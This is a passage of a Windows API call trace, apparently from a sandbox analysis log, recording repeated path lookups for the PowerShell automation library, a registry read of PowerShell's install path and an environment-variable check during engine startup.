	[0402.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.578] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16dad8 | out: phkResult=0x16dad8*=0x358) returned 0x0
	[0402.579] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16da5c, lpData=0x0, lpcbData=0x16da58*=0x0 | out: lpType=0x16da5c*=0x1, lpData=0x0, lpcbData=0x16da58*=0x56) returned 0x0
	[0402.579] CoTaskMemAlloc (cb=0x5a) returned 0x3601d0
	[0402.579] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16da2c, lpData=0x3601d0, lpcbData=0x16da28*=0x56 | out: lpType=0x16da2c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16da28*=0x56) returned 0x0
	[0402.579] CoTaskMemFree (pv=0x3601d0) 
	[0402.579] RegCloseKey (hKey=0x358) returned 0x0
	[0402.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.580] CoTaskMemAlloc (cb=0x104) returned 0x34e250
	[0402.580] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0402.580] CoTaskMemFree (pv=0x34e250) 
	[0402.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
